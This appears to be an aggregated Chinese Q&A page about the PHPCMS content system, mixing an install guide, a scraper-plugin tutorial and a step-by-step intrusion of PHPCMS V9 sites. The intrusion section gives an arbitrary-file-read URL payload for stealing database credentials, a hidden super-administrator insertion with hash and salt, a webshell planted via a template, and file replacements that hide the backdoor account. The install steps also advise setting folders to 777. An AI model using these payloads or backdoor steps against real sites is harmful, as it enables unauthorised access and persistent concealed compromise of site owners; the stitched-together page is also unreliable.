您的位置:

phpcms任意文件下载(PHP下载文件)

本文目录一览:

phpcms下载文件时,点击下载显示"非法参数"?

动易的这些细小方面,做得贴心极了,希望PHPCMS不要怕说模仿,好好看看,有好的就学,没什么。我们只想要个好程序。 查看更多答案

PHPCMS怎么添加论坛功能

第一步:到PHPCMS官网下载最新的安装包 。

第二步:将下载好的安装包在本机上解压缩。

注意:只需要上传install_package这个文件夹,可以将这个文件任意重命名,比如定义为:jiaocheng

第三步:将解压缩后的文件件,用FTP工具上传到我方服务器下(/alidata/www)。

第四步:利用XSHELL工具,将以上传的文件夹以及全部子文件夹777(修改属性)。

第五步:通过域名(IP)进入安装界面。

第六步:安装完毕进入后台。后台请参照phpcms手册操作设置。

第七步:按照提示修改部分文件夹属性。

第八步:绑定域名。

代码:

server {

listen 80 ;

server_name jiaocheng.net ;

server_name_in_redirect off;

index index.html index.htm index.php;

root /alidata/www/jiaocheng;

error_page 404 /404.html;

location ~ .*\.(php|php5)?$

{

#fastcgi_pass unix:/tmp/php-cgi.sock;

fastcgi_pass 127.0.0.1:9000;

fastcgi_index index.php;

include fastcgi.conf;

}

location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$

{

expires 30d;

}

location ~ .*\.(js|css)?$

{

expires 1h;

}

#伪静态规则

include /alidata/server/nginx/conf/rewrite/phpcms.conf;

log_format jiaocheng '$remote_addr - $remote_user [$time_local] "$request" '

'$status $body_bytes_sent "$http_referer" '

'"$http_user_agent" "$http_x_forwarded_for"';

access_log /alidata/log/nginx/access/default.log jiaocheng;

}

注意,请把jiaocheng这个词汇替换成定义的名称,即可。

有没有phpcms v9的火车头采集入口

1、首先下载安装好火车头采集器软件(收费免费的本文均适用),这个我相信大家都会,如有不会的找百度或官方论坛。二、下载phpcmsv9火车头接口文件jiekou.php与发布模块,官方下载地址,本站下载地址(选本站更好些,不用转换发布模块,站在前辈肩膀上就是好,不用写接口文件也不用写模块)。

2、接口文件修改与上传:用软件或文本打开jiekou.php文件,找到$password='123456'; ”这句把123456修改成你想要的数字串,任意数字吧,我现在把它修改为$password='111111'; ,记下这个数字串,后面设置发布模块要用到。修改后保存,用FTP上传到你网站的根目录下,即www文件夹下。

3、设置发布模块:打开火车头软件,找到界面上的:发布:按钮

4、点击进入发布模块界面,我们用6步来完成模块设置,与界面上面的12345步骤顺序有所不同。1.点击新建,找到配置名处:起个配置名,在这里我把这个配置名命名为lunwen。2.选择编码设置,与自己网站的一样吧,在这里我选择GB2312.3.登录操作:首先填入网站根目录地址,如*********,记得这个一定要填根目录;然后点击“在内置浏览器中登录”按钮,用内置浏览器把网站打开,输全后台登录网址,和平时进后台方法一样,登录后台。登录成功后点下下面的“确定”按钮,点击回到模块设置界面:

5、这步很重要,“选择web在线发布模块”,里面没有模块,我们就点最右边的绿字“更多”,然后选择“导入”选中我们在第二步中下载好的phpcmsv9发布模块phpcms9.wpm(官方下载的叫phpcms9.cwr,需要转为wpm格式,欢迎页界面的扩展上可以转)。导入后,点绿色字“编辑”,进入编辑界面,点击获取栏目列表,看到界面中“刷新列表页面”中的地址:/jiekou.php?pw=123456,后面的123456数字串要改为与jiekou.php里的一样,即/jiekou.php?pw=111111,前面jiekou.php里我们是设置为了111111,所以这里改为与之一样。

phpcms v9火车头采集器接口设置图文教程

6、设置完后再点击“内容发布参数”按钮,设置方法和上面图中的一样,见下图吧

phpcms v9火车头采集器接口设置图文教程

7、上面设置好了,这步就点“获取列表”,如果上面设置都正确,就会自动获取到网站的所有栏目,如果不能获取就说明上面设置不对,重新检查一次看看。6.成功获取列表后就算成功了,点击“保存设置”,模块设置成功。6步走总图见下图

phpcms v9火车头采集器接口设置图文教程

8、下一步就等着写采集规则了,做过采集的写火车头采集器采集规则应该不难,都差不多,只要在有多页时注意一下就行了,不懂可以查下百度或论坛,例子很多也很全。

服务器装什么软件 phpcms注入漏洞

本文利用了PHPCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)

1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。

例如将data.txt放置在yun.baidu.com/j0192/data.txt

2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞)。

/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php

3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号

username字段:admn

password字段:10203d4623c1957d041818196ff9822a

encrypt 字段:bGV22e

issuper 字段: 1

4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。

用户名:admn

密码:123456

5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。

6、打开ifeng.com/caches/caches_template/default/wap/data.class.php

用户名:admin

密码:admin

7、隐藏新增加的管理员。

通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。

8、隐藏新增加的关联链接

通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))

9、将目标网站的漏洞修复,以防其他黑客入侵。

通过木马脚本上传替换/phpcms/modules/search/index.php

防黑参考:

1、关闭数据库远程访问。

2、静态文件及附件等文件目录禁止执行权限。

3、脚本文件目录禁止写权限。

4、系统后台等重要目录限制IP访问。

5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。

phpcms v9 怎么让文件可以下载啊 ?

管理栏目,增加一个下载频道的栏目。

然后管理内容,在下载频道的栏目中添加供访问者下载的内容。